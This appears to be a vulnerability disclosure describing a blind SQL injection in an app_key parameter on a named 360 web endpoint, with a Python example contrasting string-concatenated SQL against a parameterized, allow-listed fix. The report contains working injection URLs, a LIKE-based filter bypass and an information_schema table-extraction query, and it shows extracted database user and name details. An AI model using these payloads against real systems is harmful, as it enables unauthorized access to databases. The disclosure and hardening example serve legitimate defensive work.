Defect details:

Injection point: http://open.se.360.cn/static/js/patch.php?app_key= [the app_key parameter]

1. Boolean test with 1=1 and 1=2:
   http://open.se.360.cn/static/js/patch.php?app_key=1'%20and%20(1=1)%20and%20'1'='1
   http://open.se.360.cn/static/js/patch.php?app_key=1'%20and%20(1=2)%20and%20'1'='1
   The returned content is inconsistent. The former returns:
   var ua_360 = false; var server_data = [];
   The latter returns:
   var ua_360 = false; var server_data = [... a bunch of content ...];

2. Determine the length of the database user name:
   http://open.se.360.cn/static/js/patch.php?app_key=1'%20and%20(length(user())%3E22)%20and%20'1'='1

3. However, when trying to extract content further by calling functions such as substring, left, and right, the response becomes
   var ua_360 = false; var server_data =
   and the content is no longer returned.

4. It therefore appears that some security measure has been implemented that filters out certain functions. The content can still be obtained another way:
   http://open.se.360.cn/static/js/patch.php?app_key=1'%20and (user() like 'o%') and%20'1'='1
   returns
   var ua_360 = false; var server_data = [];
   so the first letter of the user name is o, and so on. This yields the user OPEN_SE@220.***.***.186 and the database name OPEN_SE_360_CN.

5. To get the table names, write a program that runs requests of the form
   http://open.se.360.cn/static/js/patch.php?app_key=1'%20and%20(select/**/group_concat(table_name)/**/from%20information_schema.tables)%20like%20'%CHARACTER_SETS[content to be run]')%20and%20'1'='1
   The result is: EXTENSIONEXTENSION_ENABLEDEXTENSION_LATESTLOG_2012...

Solution: Filter the app_key parameter.
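Added example, not part of the report: the lookup pattern the report implies (the parameter spliced into a quoted SQL literal) beside a hardened form that applies the proposed fix, using an in-memory SQLite table as a stand-in for the real database (the schema, sample rows and allow-list pattern are assumptions). `oracle_present` is the regression check a defender would keep: it replays the two probes from step 1 and reports whether the responses still differ.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the real patch table (actual schema is unknown).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patches (app_key TEXT, server_data TEXT)")
    conn.executemany("INSERT INTO patches VALUES (?, ?)",
                     [("1", "[1,2,3]"), ("abc", "[]")])
    return conn

def lookup_vulnerable(conn, app_key):
    # The defect the report describes: the raw parameter becomes part of the
    # SQL text, so a quote in app_key changes the statement's logic.
    sql = "SELECT server_data FROM patches WHERE app_key = '" + app_key + "'"
    return [row[0] for row in conn.execute(sql)]

# Hypothetical allow-list for app_key values; adjust to the real key format.
APP_KEY_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

def lookup_safe(conn, app_key):
    # "Filter the app_key parameter": reject anything outside the allow-list,
    # then bind the value so it can never be interpreted as SQL.
    if not APP_KEY_RE.fullmatch(app_key):
        return []
    sql = "SELECT server_data FROM patches WHERE app_key = ?"
    return [row[0] for row in conn.execute(sql, (app_key,))]

# The two probes from step 1 of the report, decoded as the server would see them.
PROBE_TRUE = unquote("1'%20and%20(1=1)%20and%20'1'='1")
PROBE_FALSE = unquote("1'%20and%20(1=2)%20and%20'1'='1")

def oracle_present(lookup, conn):
    """True when the 1=1 and 1=2 probes yield different responses."""
    return lookup(conn, PROBE_TRUE) != lookup(conn, PROBE_FALSE)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle:", oracle_present(lookup_vulnerable, db))  # True
    print("hardened oracle:  ", oracle_present(lookup_safe, db))        # False
```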